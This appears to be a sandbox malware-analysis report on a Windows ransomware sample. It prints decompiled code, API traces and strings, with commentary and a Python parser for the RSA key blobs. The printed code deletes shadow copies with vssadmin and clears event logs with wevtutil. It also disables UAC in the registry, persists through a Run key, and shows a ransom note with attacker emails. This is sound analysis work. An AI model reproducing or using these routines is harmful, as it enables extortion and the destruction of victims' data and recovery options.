    							CryptImportKey(_v44, 0x403fbf, 0x114, 0, 0, "@�l");
    							_v56 = 4;
    							_t197 = _v40;
    							_t186 = 0x4040e0;
    							do {
    								_v48 = 0xf4;
    								asm("cld");
    								memcpy(_t186, _t197, 0xf4);
    								_t201 = _t201 + 0xc;
    								_push(0x500);
    								_push( &_v48);
    								_push(_t186);
    								_push(0);
    								_push(0);
    								_push(0);
    								_push( *0x403abb); // executed
    								L00401F7A(); // executed
    								_t186 = _t197 + 0x1f4;
    								_t39 =  &_v56;
    								 *_t39 = _v56 - 1;
    							} while ( *_t39 != 0);
    							_v48 = 0xc4;
    							asm("cld");
    							memcpy(_t186, _t197, 0xc4);
    							_t201 = _t201 + 0xc;
    							_push(0x500);
    							_push( &_v48);
    							_push(_t186);
    							_push(0);
    							_push(1);
    							_push(0);
    							_push( *0x403abb); // executed
    							L00401F7A(); // executed
    							CryptDestroyKey( *0x403abb); // executed
    							CryptReleaseContext(_v44, "true");
    							RegSetValueExA(_v36, "orsa", 0, 3, 0x4045e0, 0x114);
    							RegSetValueExA(_v36, "rsa", 0, 3, 0x4040e0, 0x500);
    							goto L16;
    						}
    					} else {
    						L16:
    						RegCloseKey(_v36);
    						_push(0x8000);
    						_push(_v40);
    						L00401EF6();
    						RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0xf013f,  &_v36); // executed
    						RegSetValueExA(_v36, "PromptOnSecureDesktop", 0, 4, _v40, 4);
    						RegSetValueExA(_v36, "EnableLUA", 0, 4, _v40, 4);
    						RegSetValueExA(_v36, "ConsentPromptBehaviorAdmin", 0, 4, _v40, 4);
    						RegCloseKey(_v36);
    						CryptAcquireContextA( &_v44, 0, 0, 1, 0xf0000000); // executed
    						CryptImportKey(_v44, 0x4045e0, 0x114, 0, 0, "@�l");
    						_t191 =  &M004035B5;
    						_v56 = _t191;
    						_v56 = _v56 - 5;
    						_push(4);
    						asm("lodsd");
    						asm("bswap edx");
    						asm("xlatb");
    						asm("stosb");
    						asm("rol edx, 0x6");
    						asm("loop 0xfffffff5");
    						asm("loop 0xffffffe6");
    						 *((char*)(_t191 - 1)) = 0x33;
    						GetSystemTimeAsFileTime( &_v28);
    						_v28.dwHighDateTime = _v28.dwHighDateTime + 0x258;
    						FileTimeToSystemTime( &_v28,  &_v20);
    						GetDateFormatA(0, 0,  &_v20, "dd,MM,yyyy",  &M00403449, 0xa);
    						 *0x403ab3 = lstrlenA("<html><head><hta:application id=1\r\nshowInTaskBar=no\r\ncaption=no\r\nborder=none\r\ninnerBorder=no\r\nscroll=no\r\ncontextmenu=no\r\nwindowstate=maximize />\r\n<script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!=\'undefined\'?Y:now.getFullYear();Z=Z?Z-1:now.getMonth();D=typeof(D)!=\'undefined\'?D:now.getDate();H=typeof(H)!=\'undefined\'?H:now.getHours();M=typeof(M)!=\'undefined\'?M:now.getMinutes();var endDate=new Date(Y,Z,D,H,M,s+1);var i=setInterval(function(){var t=endDate.getTime()-now.getTime();if(t<0){clearInterval(i);alert(\'Time is up!\');}else{var d=Math.floor(t/864e5);var h=Math.floor(t/36e5)%24;var o=Math.floor(t/6e4)%60;var p=Math.floor(t/1e3)%60;var i=\'<div style=\"width:90px;float:left;text-align:center\"><div style=\"font-size:65px;\">\';var l=\'</div><div>\';var e=\'</div></div><div style=\"float:left;font-size:60px;\">:</div>\';document.getElementById(\'X\').innerHTML=i+d+l+\'Day\'+e+i+h+l+\'Hours\'+e+i+o+l+\'Minutes\'+e+i+p+l+\'Seconds\';if(!p&&!o&&!d&&!h){clearInterval(i);alert(\'Time is up!\');}}now.setSeconds(now.getSeconds()+1);},1000);}C(00,00,12,04,05,2019);</script></head><body style=\'text-align:center;background:#000\'></br></br></br><h2 style=\'font-size:40px;color:#b00\'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonStokton@tutanota.com</h2></br></br><h1 style=\'color:#FFF\'>Your<h2 style=\'font-size:40px;color:#00F\'> [ID]XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!</br>Attention!!!</br>At the end of this time, the private key for generating the decoder will be destroyed. 
Files will not be restored!</h1></br></br><div id=\'X\' style=\'position:absolute;left:40%;color:#F00\'></div></body></html>");
    						MultiByteToWideChar(3, 0, _v56, 0xffffffff, 0x4046f4, 0x19);
    						 *0x4046f4 = 0x2e;
    						_t192 = _v40;
    						asm("cld");
    						memcpy(_t192, _v56, 0x19);
    						_t195 = _t192;
    						 *_t195 = 0x2e;
    						lstrcatA(_t195, "\\shell\\open\\command");
    						RegCreateKeyA(0x80000000, _t195,  &_v36); // executed
    						_t196 =  &(_t195[0x200]);
    						lstrcatA(_t196, "C:\\Windows\\System32\\mshta.exe ");
    						lstrcatA(_t196, "\"c:\\Decoding help.hta\"");
    						RegSetValueExA(_v36, 0x403003, 0, 1, _t196, lstrlenA(_t196));
    						RegCloseKey(_v36);
    						SHChangeNotify(0x8000000, 0, 0, 0); // executed
    						GetEnvironmentVariableA("ComSpec", _v40, 0x5dc); // executed
    						ShellExecuteA(0, 0, _v40, "/c vssadmin delete shadows /all", 0, 0); // executed
    						GlobalFree(_v40); // executed
    						SetErrorMode(1); // executed
    						E00401DE7("SeBackupPrivilege", 0); // executed
    						E00401DE7("SeRestorePrivilege", 0); // executed
    						while(1) {
    							E004016FF(); // executed
    							while(1) {
    								Sleep(0x7530); // executed
    								if( *0x403ab7 == 0) {
    									break;
    								}
    							}
    							Sleep(0x1388);
    							if(_v60 == 0) {
    								_v60 = _v60 + 1;
    								ShellExecuteA(0, "open", "\"c:\\Decoding help.hta\"", 0, 0, 5);
    							}
    							_v44 = CreateFileA("C:\\windows\\clerlog.bat", 0xc0000000, 0, 0, 4, 0, 0);
    							WriteFile(_v44, "@echo off\r\nfor /F \"tokens=*\" %%G in (\'wevtutil.exe el\') DO (call:r \"%%G\")\r\ngoto End\r\n:r\r\nwevtutil.exe cl %1\r\ngoto :eof\r\n:End\r\nrd /s /q %systemdrive%\\$RECYCLE.BIN\r\ndel %0", 0xaa,  &_v56, 0);
    							CloseHandle(_v44);
    							ShellExecuteA(0, "open", "C:\\windows\\clerlog.bat", 0, 0, 0);
    						}
    					}
    				}
    			}
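The key setup in the listing above is a textbook hybrid scheme, and every constant in it checks out against the Microsoft CryptoAPI blob formats: CryptGenKey is called with Algid 1 (AT_KEYEXCHANGE) and dwFlags 0x08000001, whose upper 16 bits give the key size (0x0800 = 2048 bits) and whose low bit is CRYPT_EXPORTABLE; the PRIVATEKEYBLOB (type 7) exported into a 0x494-byte buffer and the PUBLICKEYBLOB (type 6) exported into 0x114 bytes are exactly the sizes of those blobs for a 2048-bit key; the 0x114-byte blob imported from 0x403fbf is the attacker's embedded RSA-2048 public key; and the private blob is then encrypted with it in 0xf4-byte pieces (under the PKCS#1 v1.5 limit of k-11 = 245 bytes) into a 0x500-byte buffer, since five 256-byte RSA blocks cover 4 x 244 + 196 = 1172 bytes. The result lands in the "rsa" registry value and the victim's public key in "orsa", so recovery requires the attacker's private key. The Python below is an added example for this report, not code from the sample or from Joe Sandbox; it builds and parses both blob layouts and reproduces the chunk schedule. The key material it uses is constructed filler sized like a 2048-bit key, not a real key pair, so it demonstrates the layout only and cannot encrypt or decrypt anything.

```python
"""Microsoft CryptoAPI RSA blob layout, as used by the sample's key-wrapping step.

Added example for this report; it is not code from the sample or from Joe Sandbox.
The key material below is constructed filler (NOT a real RSA key), so the blobs
parse and round-trip correctly but cannot encrypt anything.
"""
import struct
from dataclasses import dataclass
from typing import List, Optional, Tuple

PUBLICKEYBLOB, PRIVATEKEYBLOB = 0x06, 0x07       # BLOBHEADER.bType (CryptExportKey types 6 and 7)
CALG_RSA_KEYX = 0x0000A400                       # BLOBHEADER.aiKeyAlg
RSA1, RSA2 = 0x31415352, 0x32415352              # RSAPUBKEY.magic: 'RSA1' public, 'RSA2' private
HEADER = "<BBHIIII"                              # bType, bVersion, reserved, aiKeyAlg, magic, bitlen, pubexp


@dataclass
class RsaBlob:
    bit_length: int
    public_exponent: int
    modulus: int
    private_exponent: Optional[int] = None       # present only for PRIVATEKEYBLOB


def blob_sizes(bits: int) -> Tuple[int, int]:
    """(PUBLICKEYBLOB size, PRIVATEKEYBLOB size) for an RSA key of `bits` bits."""
    n_len, half = bits // 8, bits // 16
    public = struct.calcsize(HEADER) + n_len                  # 20-byte header + modulus
    private = public + 5 * half + n_len                       # + p, q, dP, dQ, qInv + d
    return public, private


def build_public_blob(n: int, e: int, bits: int) -> bytes:
    return (struct.pack(HEADER, PUBLICKEYBLOB, 2, 0, CALG_RSA_KEYX, RSA1, bits, e)
            + n.to_bytes(bits // 8, "little"))


def build_private_blob(n, e, d, p, q, dp, dq, qinv, bits: int) -> bytes:
    half = bits // 16
    return (struct.pack(HEADER, PRIVATEKEYBLOB, 2, 0, CALG_RSA_KEYX, RSA2, bits, e)
            + n.to_bytes(bits // 8, "little")
            + b"".join(x.to_bytes(half, "little") for x in (p, q, dp, dq, qinv))
            + d.to_bytes(bits // 8, "little"))


def parse_rsa_blob(blob: bytes) -> RsaBlob:
    """Parse a PUBLICKEYBLOB or PRIVATEKEYBLOB; every integer is little-endian."""
    b_type, b_version, _reserved, alg, magic, bits, e = struct.unpack_from(HEADER, blob, 0)
    if b_version != 2 or alg != CALG_RSA_KEYX:
        raise ValueError("not a CryptoAPI RSA key blob")
    n_len, half = bits // 8, bits // 16
    off = struct.calcsize(HEADER)
    n = int.from_bytes(blob[off:off + n_len], "little")
    off += n_len
    if b_type == PUBLICKEYBLOB and magic == RSA1:
        if len(blob) != off:
            raise ValueError("truncated or padded PUBLICKEYBLOB")
        return RsaBlob(bits, e, n)
    if b_type == PRIVATEKEYBLOB and magic == RSA2:
        off += 5 * half                                        # skip the CRT parameters
        if len(blob) != off + n_len:
            raise ValueError("truncated or padded PRIVATEKEYBLOB")
        d = int.from_bytes(blob[off:off + n_len], "little")
        return RsaBlob(bits, e, n, d)
    raise ValueError("bType/magic mismatch: 0x%02x / 0x%08x" % (b_type, magic))


def wrap_schedule(plain_len: int, modulus_len: int = 256, chunk: int = 0xF4) -> Tuple[List[int], int]:
    """Chunk sizes and ciphertext length when `plain_len` bytes are RSA/PKCS#1 v1.5
    encrypted `chunk` bytes at a time; each chunk becomes one modulus-sized block."""
    if chunk > modulus_len - 11:
        raise ValueError("chunk exceeds the PKCS#1 v1.5 type-2 capacity of k-11 bytes")
    chunks = [chunk] * (plain_len // chunk)
    if plain_len % chunk:
        chunks.append(plain_len % chunk)
    return chunks, len(chunks) * modulus_len


# Constructed filler values, sized like a 2048-bit key (NOT a real key pair).
BITS = 2048
FILLER_N = (1 << 2047) | 0x5A5A5A5A
FILLER_D = (1 << 2040) | 0xA5A5A5A5
FILLER_CRT = [(1 << 1023) | i for i in range(1, 6)]            # p, q, dP, dQ, qInv


def demo() -> Tuple[int, int, List[int], int]:
    """Reproduce the four constants from E004017A2: 0x114, 0x494, [0xf4]*4 + [0xc4], 0x500."""
    pub = build_public_blob(FILLER_N, 65537, BITS)
    prv = build_private_blob(FILLER_N, 65537, FILLER_D, *FILLER_CRT, BITS)
    assert parse_rsa_blob(pub).modulus == FILLER_N
    assert parse_rsa_blob(prv).private_exponent == FILLER_D
    chunks, ct_len = wrap_schedule(len(prv), BITS // 8)
    return len(pub), len(prv), chunks, ct_len


if __name__ == "__main__":
    print(demo())
```

In an incident, parse_rsa_blob is what you would run on the 0x114-byte "orsa" value and on the 0x114 bytes at file offset 0xfbf of the sample to recover the victim's and the attacker's moduli respectively; the 0x500-byte "rsa" value is the wrapped private key and is useless without the attacker's private key, which is the point of the scheme.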

    (The per-line instruction address column for the listing above, running from 0x004017a8 to 0x00401d26, is omitted.)

    APIs
      • Part of subcall function 00401781: GlobalAlloc.KERNEL32(00000040,?,?,004010A6,00008000), ref: 00401789
      • Part of subcall function 00401781: Sleep.KERNEL32(000000C8,00000040,?,?,004010A6,00008000), ref: 00401797
    • GetModuleFileNameA.KERNEL32(00000000,00000000,00008000,00008000), ref: 004017C4
    • lstrcmpiA.KERNEL32(C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017D1
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017EF
    • lstrlenA.KERNEL32("c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 004017F9
    • RegSetValueExA.ADVAPI32(?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000), ref: 00401810
    • lstrlenA.KERNEL32(C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000), ref: 0040181A
    • RegSetValueExA.ADVAPI32(?,searchfiles,00000000,00000001,C:\windows\searchfiles.exe,00000000,C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Run\), ref: 00401831
    • RegCloseKey.ADVAPI32(?,?,searchfiles,00000000,00000001,C:\windows\searchfiles.exe,00000000,C:\windows\searchfiles.exe,?,unlock,00000000,00000001,"c:\Decoding help.hta",00000000,"c:\Decoding help.hta",80000002), ref: 00401839
    • CopyFileA.KERNEL32(?,C:\windows\searchfiles.exe,00000000), ref: 00401848
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000,00008000), ref: 00401862
    • RegQueryValueExA.ADVAPI32(?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?,C:\windows\searchfiles.exe,?,00000000,00000000,00008000), ref: 00401883
    • RegQueryValueExA.ADVAPI32(?,rsa,00000000,00000000,004040E0,00000500,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F), ref: 004018B1
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?), ref: 004018D7
    • GetLastError.KERNEL32(?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\,00000000,000F013F,?), ref: 004018E0
    • GetEnvironmentVariableA.KERNEL32(ComSpec,?,000005DC,?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,orsa,00000000), ref: 004018F9
    • ShellExecuteA.SHELL32(00000000,00000000,?,/c Regsvr32 /s Rsaenh.dll,00000000,00000000), ref: 0040190E
    • Sleep.KERNEL32(00000064,00000000,00000000,?,/c Regsvr32 /s Rsaenh.dll,00000000,00000000,ComSpec,?,000005DC,?,00000000,00000000,00000001,00000008,?), ref: 00401915
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,00000008,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114), ref: 00401931
    • CryptGenKey.ADVAPI32(?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?,orsa,00000000,00000000,004045E0,00000114,80000002), ref: 00401946
    • CryptExportKey.ADVAPI32(?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?,?,00000000,00000000,00000001,F0000000,?), ref: 00401962
    • CryptExportKey.ADVAPI32(?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001,?), ref: 00401980
    • CryptDestroyKey.ADVAPI32(?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?,00000001,08000001), ref: 00401988
    • CryptReleaseContext.ADVAPI32(?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000,00000007,00000000,?,00000494,?), ref: 00401992
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000,00000006,00000000,004045E0,00000114,?,00000000), ref: 004019A6
    • CryptImportKey.ADVAPI32(?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,00000000,?,?,00000000), ref: 004019C1
    • CryptEncrypt.ADVAPI32(00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000,00000000,@l,?,00000000,00000000,00000001), ref: 004019F9
    • CryptEncrypt.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A29
    • CryptDestroyKey.ADVAPI32(00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF,00000114,00000000), ref: 00401A34
    • CryptReleaseContext.ADVAPI32(?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000,00000000,?,00000114,00000500,?,00403FBF), ref: 00401A3E
    • RegSetValueExA.ADVAPI32(?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001,00000000,?,00000114,00000500,00000000,00000000), ref: 00401A59
    • RegSetValueExA.ADVAPI32(?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000,00000001), ref: 00401A74
    • RegCloseKey.ADVAPI32(?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?,00000000,00000000), ref: 00401A7C
    • RtlZeroMemory.KERNEL32(?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa,00000000,00000003,004045E0,00000114,?), ref: 00401A89
    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa,00000000,00000003,004040E0,00000500,?,orsa), ref: 00401AA3
    • RegSetValueExA.ADVAPI32(?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F,?,?,00008000,?,?,rsa), ref: 00401AB9
    • RegSetValueExA.ADVAPI32(?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004,?,00000004,80000002,SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\,00000000,000F013F), ref: 00401ACF
    • RegSetValueExA.ADVAPI32(?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000,00000004), ref: 00401AE5
    • RegCloseKey.ADVAPI32(?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004,?,00000004,?,PromptOnSecureDesktop,00000000), ref: 00401AED
    • CryptAcquireContextA.ADVAPI32(?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004,?,00000004,?,EnableLUA,00000000,00000004), ref: 00401B01
    • CryptImportKey.ADVAPI32(?,004045E0,00000114,00000000,00000000,@l,?,00000000,00000000,00000001,F0000000,?,?,ConsentPromptBehaviorAdmin,00000000,00000004), ref: 00401B1C
    Strings
    • /c Regsvr32 /s Rsaenh.dll, xrefs: 00401902
    • SeBackupPrivilege, xrefs: 00401C72
    • \shell\open\command, xrefs: 00401BD3
    • ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open, xrefs: 00401B27
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Run\, xrefs: 004017E5
    • ConsentPromptBehaviorAdmin, xrefs: 00401ADD
    • XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<, xrefs: 00401B2D
    • unlock, xrefs: 00401808
    • C:\windows\clerlog.bat, xrefs: 00401CDD, 00401D10
    • SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\, xrefs: 00401A99
    • PromptOnSecureDesktop, xrefs: 00401AB1
    • SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\, xrefs: 00401858
    • SeRestorePrivilege, xrefs: 00401C7E
    • C:\windows\searchfiles.exe, xrefs: 004017CC, 00401815, 00401820, 00401840
    • C:\Windows\System32\mshta.exe , xrefs: 00401BF3
    • @echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0, xrefs: 00401CF5
    • EnableLUA, xrefs: 00401AC7
    • ComSpec, xrefs: 004018F4, 00401C42
    • dd,MM,yyyy, xrefs: 00401B83
    • "c:\Decoding help.hta", xrefs: 004017F4, 004017FF, 00401BFE, 00401CBD
    • /c vssadmin delete shadows /all, xrefs: 00401C50
    • orsa, xrefs: 0040187B, 00401A51
    • searchfiles, xrefs: 00401829
    • @l, xrefs: 004019AB, 00401B06
    • 04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS, xrefs: 00401B7E
    • <html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined, xrefs: 00401B95
    Memory Dump Source
    • Source File: 00000000.00000001.593332961.0000000000401000.00000020.sdmp, Offset: 00400000, based on PE: true
    • Associated: 00000000.00000001.593319076.0000000000400000.00000002.sdmp
    • Associated: 00000000.00000001.593340737.0000000000402000.00000002.sdmp
    • Associated: 00000000.00000001.593354738.0000000000403000.00000008.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_1_400000_module.jbxd
    Similarity
    • API ID: Crypt$Value$Context$Acquire$CloseOpen$DestroyEncryptExportFileImportQueryReleaseSleeplstrlen$AllocCopyEnvironmentErrorExecuteGlobalLastMemoryModuleNameShellVariableZerolstrcmpi
    • String ID: "c:\Decoding help.hta"$/c Regsvr32 /s Rsaenh.dll$/c vssadmin delete shadows /all$04,05,2019);</script></head><body style='text-align:center;background:#000'></br></br></br><h2 style='font-size:40px;color:#b00'>You are unlucky! The terrible virus has captured your files! For decoding please contact by email JonStokton@Protonmail.com or JonS$<html><head><hta:application id=1showInTaskBar=nocaption=noborder=noneinnerBorder=noscroll=nocontextmenu=nowindowstate=maximize /><script>function C(s,M,H,D,Z,Y){var now=new Date();s=(arguments.length==1)?s+now.getss():s;Y=typeof(Y)!='undefined$@echo offfor /F "tokens=*" %%G in ('wevtutil.exe el') DO (call:r "%%G")goto End:rwevtutil.exe cl %1goto :eof:Endrd /s /q %systemdrive%\$RECYCLE.BINdel %0$@l$ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+-open$C:\Windows\System32\mshta.exe $C:\windows\clerlog.bat$C:\windows\searchfiles.exe$ComSpec$ConsentPromptBehaviorAdmin$EnableLUA$PromptOnSecureDesktop$SOFTWARE\Microsoft\Windows\CurrentVersion\DateTime\$SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\$SOFTWARE\Microsoft\Windows\CurrentVersion\Run\$SeBackupPrivilege$SeRestorePrivilege$XE0PGVAVqcuaklH3[ID]</h2></br>1. In the subject line, write your ID.</br>2. Attach 1-2 infected files that do not contain important information (less than 2 mb)</br>are required to generate the decoder and restore the test file.</br>Hurry up! Time is limited!<$\shell\open\command$dd,MM,yyyy$orsa$searchfiles$unlock
    • API String ID: 502290952-998760635
    • Opcode ID: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction ID: 86879c33b08c28671aa86a1e658d7eba573c44414e10c71c68188b85a97574e0
    • Opcode Fuzzy Hash: 067f5b85d839d909d261e6f5ecec44bc9520b5d9e95da1cec580265f3e11e12d
    • Instruction Fuzzy Hash: 60D1C071B943097AEB21AA91CC43FDE7A79AB04B09F20413AF700790E1D7FD6A14966D
    Uniqueness

    Uniqueness Score: -1,00%

    C-Code - Quality: 55%
    			E0040191C() {
    				void* _t138;
    				long _t143;
    				void* _t144;
    				char* _t147;
    				CHAR* _t148;
    				void* _t149;
    				void* _t153;
    				void* _t154;
    
    				_push(_t153 - 0x1c);
    				_push(0x8000001);
    				_push(1);
    				_push( *(_t153 - 0x28));
    				L00401F86(); // executed
    				 *(_t153 - 0x2c) = 0x494;
    				_push(_t153 - 0x2c);
    				_push( *(_t153 - 0x24));
    				_push(0);
    				_push(7);
    				_push(0);
    				_push( *(_t153 - 0x1c));
    				L00401F80(); // executed
    				 *(_t153 - 0x2c) = 0x114;
    				_push(_t153 - 0x2c);
    				_push(0x4045e0);
    				_push(0);
    				_push(6);
    				_push(0);
    				_push( *(_t153 - 0x1c));
    				L00401F80();
    				CryptDestroyKey( *(_t153 - 0x1c));
    				CryptReleaseContext( *(_t153 - 0x28), 0);
    				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
    				CryptImportKey( *(_t153 - 0x28), 0x403fbf, 0x114, 0, 0, "@�l");
    				 *(_t153 - 0x34) = 4;
    				_t149 =  *(_t153 - 0x24);
    				_t138 = 0x4040e0;
    				do {
    					 *(_t153 - 0x2c) = 0xf4;
    					asm("cld");
    					memcpy(_t138, _t149, 0xf4);
    					_t154 = _t154 + 0xc;
    					_push(0x500);
    					_push(_t153 - 0x2c);
    					_push(_t138);
    					_push(0);
    					_push(0);
    					_push(0);
    					_push( *0x403abb); // executed
    					L00401F7A(); // executed
    					_t138 = _t149 + 0x1f4;
    					_t18 = _t153 - 0x34;
    					 *_t18 =  *(_t153 - 0x34) - 1;
    				} while ( *_t18 != 0);
    				 *(_t153 - 0x2c) = 0xc4;
    				asm("cld");
    				memcpy(_t138, _t149, 0xc4);
    				_push(0x500);
    				_push(_t153 - 0x2c);
    				_push(_t138);
    				_push(0);
    				_push(1);
    				_push(0);
    				_push( *0x403abb); // executed
    				L00401F7A(); // executed
    				CryptDestroyKey( *0x403abb); // executed
    				CryptReleaseContext( *(_t153 - 0x28), "true");
    				RegSetValueExA( *(_t153 - 0x20), "orsa", 0, 3, 0x4045e0, 0x114);
    				RegSetValueExA( *(_t153 - 0x20), "rsa", 0, 3, 0x4040e0, 0x500);
    				RegCloseKey( *(_t153 - 0x20));
    				_push(0x8000);
    				_push( *(_t153 - 0x24));
    				L00401EF6();
    				RegOpenKeyExA(0x80000002, "SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Policies\\System\\", 0, 0xf013f, _t153 - 0x20); // executed
    				RegSetValueExA( *(_t153 - 0x20), "PromptOnSecureDesktop", 0, 4,  *(_t153 - 0x24), 4);
    				RegSetValueExA( *(_t153 - 0x20), "EnableLUA", 0, 4,  *(_t153 - 0x24), 4);
    				RegSetValueExA( *(_t153 - 0x20), "ConsentPromptBehaviorAdmin", 0, 4,  *(_t153 - 0x24), 4);
    				RegCloseKey( *(_t153 - 0x20));
    				CryptAcquireContextA(_t153 - 0x28, 0, 0, 1, 0xf0000000); // executed
    				CryptImportKey( *(_t153 - 0x28), 0x4045e0, 0x114, 0, 0, "@�l");
    				_t143 =  &M004035B5;
    				 *(_t153 - 0x34) = _t143;
    				 *(_t153 - 0x34) =  *(_t153 - 0x34) - 5;
    				_push(4);
    				asm("lodsd");
    				asm("bswap edx");
    				asm("xlatb");
    				asm("stosb");
    				asm("rol edx, 0x6");
    				asm("loop 0xfffffff5");
    				asm("loop 0xffffffe6");
    				 *((char*)(_t143 - 1)) = 0x33;
    				GetSystemTimeAsFileTime(_t153 - 0x18);
    				 *((intOrPtr*)(_t153 - 0x14)) =  *((intOrPtr*)(_t153 - 0x14)) + 0x258;
    				FileTimeToSystemTime(_t153 - 0x18, _t153 - 0x10);
    				GetDateFormatA(0, 0, _t153 - 0x10, "dd,MM,yyyy",  &M00403449, 0xa);
